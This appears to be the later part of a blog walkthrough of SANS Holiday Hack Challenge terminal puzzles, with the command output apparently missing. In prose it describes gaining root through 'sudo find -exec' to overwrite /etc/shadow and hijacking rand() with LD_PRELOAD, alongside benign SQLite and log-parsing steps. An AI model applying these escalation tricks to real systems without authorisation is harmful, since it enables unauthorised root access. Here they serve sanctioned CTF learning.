    Since it's x64, I need to see if I can execute CandyCaneStriper with ld-linux-x86-64.so.2 (after finding it first since it wasn't in /lib like the article states):

    Success!

    Christmas Songs Data Analysis


    This challenge brought back skills that I hadn't used in YEARS! The first thing I did was to see what type of input they're looking for in the answer, so I simply ran runtoanswer:

    So it appears to be the name of the song (and I do like the startup delay to prevent any brute-forcing). The next file to notice is the christmassongs.db file. Let's see if it's a sqlite database (as their databases typically end with .db extensions):
    Seems like it is, so the first thing I like to do is look for any tables and what their column names are:
    There could be multiple approaches to take here, but the mine will be a 2-step process. The first step will be to get a count of each unique songid in the likes table:
    I'll break apart this complex SQLite query:

    • select songid, count(songid) from likes: Just show me the songid and how many from the likes table
    • group by songid: "Uniques" the results
    • order by count(songid) desc: Sort the results by the count of songids in descending order
    • limit 1: Only show the top result
    The second step is to find the title of the song with an id of 392:
    "Stairway to Heaven"? That can't be right! That's not even a Christmas song! Let's try it as our answer anyway:
    Success!

    Shadow File Restoration

    Right away, this one starts with a hint... that sudo is likely to be used. This saves a lot of time with trying other privilege escalation methods, so I checked to see what commands this user can run as root:

    Seems that the only option is run find as root, but what's weird is that the output is showing that the user "elf" must run this command as group "shadow". This was a learning moment for me as I've never used sudo with the -g option. But... back to find. How will find help me? Luckily, find is one of the well known "shell escapable" commands by passing the -exec option to it. Knowing this, I used find (now running as root) to discover a file that I created and then, using the -exec option restored the /etc/shadow file:
    Did it work?

    Success!

    Isit42


    This one took a little bit of reverse engineering as well as reading one of the pentest blogs to fully grasp what we need to do here. The first thing I looked at was the snippet of code to see what function calls are being initiated by the program:

    After looking at this, it appears that a random number is returned instead of 42. Wouldn't it be nice if we could inject our own version of rand() to return 42? Turns out, with LD_PRELOAD, we can.

    The first step I took is to create a short program (myrandom.c) with the following code:
    Looks simple enough, right? This program simple returns the number 42 if the rand function is called. The next step is to compile it with the -shared and -fPIC options, set the LD_PRELOAD variable to point at our current directory, and run the executable:

    This loaded my version of rand instead of the native one... giving us 42 every time rand() is called.
    Success!

    Troublesome Process Termination


    This one confused me for quite some time. Why, when running "which kill" and getting /bin/kill, running kill <pid> (which doesn't kill the process) yield different results than /bin/kill <pid>? The answer: alias! As shown below, all of the kill commands are simply set to 'true', which means THEY DO NOTHING!
    Next I found the process ID for santaslittlehelperd, killed with the full path for kill, and double-checked that it was killed:
    Success!

    Web Log

    This one was actually pretty simple as I often finding myself doing plenty of command-line kung-fu during my day job. As this is just an access log from a web server, it's in a standard format. The easiest way to peel out the User Agent (browser) is to separate the output by double-quotes and grab the 6th entry for each line (piped to "head" just to show the command and some of the output):
    Next was to sort and uniq the data to get a count of each browser (using "head" again to show the command and some of the output):
    After this I got the least common browser by piping the previous command to sort -n (for sort by number -- in ascending order) and piping that to head -n 1 to show only the top hit:
    And now for the test:
    Success!

    Train Startup


    Another VERY unique challenge! The first step is to look closely at the "file" command output:

    Hmm... that's strange. Why is this not x64? What would an ARM application be doing on this machine? After a quick Google search on how to execute an ARM application in Linux, I stumbled onto this page: http://tuxthink.blogspot.com/2012/04/executing-arm-executable-in-x86-using.html

    After verifying that qemu-arm is installed, I tried to run it along with our "broken" executable:



    Success!

    Extras

    Elves' Hints


    The Fifth Page

    This page was not part of the nine challenges above, but is required to get 100% of the objectives for the "Bumbles Bounce" game. Again, I'm not going to show my layout of tools, but here's the proof:

    100% Completion of Games

    Here's the proof that I completed 100% on the remaining five games:





    Unlocked Tools

    All the Points!


    Conclusion

    This article should give you all you need to complete the SANS Holiday Hack Challenge with the exception of the tool placement for the games. Good Luck!